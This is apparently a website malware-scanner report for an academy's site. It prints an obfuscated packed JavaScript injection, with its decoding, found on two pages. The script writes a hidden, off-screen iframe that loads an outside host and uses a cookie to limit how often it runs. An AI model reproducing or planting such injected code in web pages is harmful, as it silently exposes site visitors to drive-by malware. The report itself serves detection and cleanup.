New scan:

Malware Scanner report for calydonitacademy.com

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://calydonitacademy.com/
200 OK
Content-Length: 22981
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\x5C\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x49 \142=F\40\105(\51;\x62.Y(\142.12(\x29+\x32\x29;\x311\x281\60\x2E\117&\46f\56\x42\x2E\x54(\47\\S\134\x58\\j\134\x55\\\x65\134\150\')\75=\55\x31\x2
... 1893 bytes are skipped ...
x365\x7Cs\145\x74\x44\141\164e|\x787\64\x68\x7C\x6Ea\166\151gat\x6Fr\x7Cif|\x67\145tDa\164\x65\174x\x33\106\174x6\67\x7C\170\66\x46\1745\66\x63\174to\x55T\103St\x72\x69\156g\x7C167|x\x36B\171\174x7\65\x6D\164|\71\7199\x3999|\617\x30p|1\x34\x31\x6D\1747\x35\x31\x7C\x78\62\x32\174\x315\61f\x72\x7C\61\654\174x\x36\x36t\174x7\70\174\x373\164\x7C\61\65\64e\x7C\x78\x36F\x6C\x7C\170\675|\170\67\64e\x7C\170\x36F\160|\65\67\x76\x70\174\614\x33\174\1707\x34\x70|\x782\104\x7C\61\67\60'.split('\x7C'),0,{}))

Decoded script:


var exp=new Date();exp.setDate(exp.getDate()+2);if(navigator.cookieEnabled&&document.cookie.indexOf('\x5F_\165\155\x74\x64\x3D')==-1){document.write('\74\151\x66r\x61\x6D\x65\x20\x77\x69d\x74h\x3D\42'+Math.floor(Math.random()*100+100)+'\" \150\145\151\x67h\164=\42'+Math.floor(Math.random()*100+100)+'\42\40\146\162\x61\155\145\x62\157\x72\144\145r=\42\x30\42 \x73\164\171l\x65\x3D\42\x70o\163\151\164\151on\x3A\141\x62\163\x6Fl\x75\x74e\x3B\154e\x66t\72-'+Math.floor(Math.random()*100+2
... 897 bytes are skipped ...
th.floor(Math.random()*100+200)+'p\170\42\40\163\x72\143\75\42\150\164\x74p\x3A\x2F\57vp\x70\163\x77\x77\x77\x65\x64\154.2\167\141\x6By\56c\157\x6D\x2F\x3F\x67\x6F\751\x22\x3E</\151fr\141m\x65\x3E');document.cookie='\137\137\x75mt\x64='+Math.floor(Math.random()*9999999)+'\x3B\x20\145\170p\151\x72\145\x73\75'+exp.toUTCString()}
<iframe width="163" height="174" frameborder="0" style="position:absolute;left:-243px;top:-267px" src="http://vppswwwedl.2waky.com/?go=1"></iframe>

Antivirus reports:

Sophos
Mal/Iframe-AN

http://calydonitacademy.com/lightbox/javascripts/top_up-min.js
200 OK
Content-Length: 48729
Content-Type: text/javascript
clean
http://www.google.co.in/cse/brand?form=cse-search-box&lang=en
200 OK
Content-Length: 2508
Content-Type: text/javascript
clean
http://calydonitacademy.com/index.htm
200 OK
Content-Length: 22981
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\x5C\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x49 \142=F\40\105(\51;\x62.Y(\142.12(\x29+\x32\x29;\x311\x281\60\x2E\117&\46f\56\x42\x2E\x54(\47\\S\134\x58\\j\134\x55\\\x65\134\150\')\75=\55\x31\x2
... 1893 bytes are skipped ...
x365\x7Cs\145\x74\x44\141\164e|\x787\64\x68\x7C\x6Ea\166\151gat\x6Fr\x7Cif|\x67\145tDa\164\x65\174x\x33\106\174x6\67\x7C\170\66\x46\1745\66\x63\174to\x55T\103St\x72\x69\156g\x7C167|x\x36B\171\174x7\65\x6D\164|\71\7199\x3999|\617\x30p|1\x34\x31\x6D\1747\x35\x31\x7C\x78\62\x32\174\x315\61f\x72\x7C\61\654\174x\x36\x36t\174x7\70\174\x373\164\x7C\61\65\64e\x7C\x78\x36F\x6C\x7C\170\675|\170\67\64e\x7C\170\x36F\160|\65\67\x76\x70\174\614\x33\174\1707\x34\x70|\x782\104\x7C\61\67\60'.split('\x7C'),0,{}))

Decoded script:


var exp=new Date();exp.setDate(exp.getDate()+2);if(navigator.cookieEnabled&&document.cookie.indexOf('\x5F_\165\155\x74\x64\x3D')==-1){document.write('\74\151\x66r\x61\x6D\x65\x20\x77\x69d\x74h\x3D\42'+Math.floor(Math.random()*100+100)+'\" \150\145\151\x67h\164=\42'+Math.floor(Math.random()*100+100)+'\42\40\146\162\x61\155\145\x62\157\x72\144\145r=\42\x30\42 \x73\164\171l\x65\x3D\42\x70o\163\151\164\151on\x3A\141\x62\163\x6Fl\x75\x74e\x3B\154e\x66t\72-'+Math.floor(Math.random()*100+2
... 897 bytes are skipped ...
th.floor(Math.random()*100+200)+'p\170\42\40\163\x72\143\75\42\150\164\x74p\x3A\x2F\57vp\x70\163\x77\x77\x77\x65\x64\154.2\167\141\x6By\56c\157\x6D\x2F\x3F\x67\x6F\751\x22\x3E</\151fr\141m\x65\x3E');document.cookie='\137\137\x75mt\x64='+Math.floor(Math.random()*9999999)+'\x3B\x20\145\170p\151\x72\145\x73\75'+exp.toUTCString()}
<iframe width="178" height="133" frameborder="0" style="position:absolute;left:-258px;top:-247px" src="http://vppswwwedl.2waky.com/?go=1"></iframe>

Antivirus reports:

Sophos
Mal/Iframe-AN

http://calydonitacademy.com/AboutUs.htm
200 OK
Content-Length: 13869
Content-Type: text/html
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21950
Content-Type: text/javascript
clean
http://calydonitacademy.com/Certification.htm
200 OK
Content-Length: 17353
Content-Type: text/html
clean
http://calydonitacademy.com/Training.htm
200 OK
Content-Length: 54446
Content-Type: text/html
clean
http://calydonitacademy.com/Facilities.htm
200 OK
Content-Length: 18759
Content-Type: text/html
clean
http://calydonitacademy.com/ http://www.calydonitacademy.com/registration.htm
404 Not Found
Content-Length: 2445
Content-Type: text/html
clean
http://cdn.dsultra.com/js/registrar.js
200 OK
Content-Length: 1652
Content-Type: application/x-javascript
clean
http://calydonitacademy.com/test404page.js
404 Not Found
Content-Length: 2445
Content-Type: text/html
clean
http://calydonitacademy.com/Careers.htm
200 OK
Content-Length: 21241
Content-Type: text/html
clean
http://calydonitacademy.com/Contact.htm
200 OK
Content-Length: 16201
Content-Type: text/html
clean
http://calydonitacademy.com/thumbnailviewer.js
200 OK
Content-Length: 7633
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: calydonitacademy.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 16 Apr 2014 03:05:14 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 22981
Content-Type: text/html
Last-Modified: Tue, 01 Apr 2014 08:52:17 GMT

...22981 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: calydonitacademy.com
Referer: http://www.google.com/search?q=calydonitacademy.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=calydonitacademy.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://calydonitacademy.com/

Result: calydonitacademy.com is not infected or malware details are not published yet.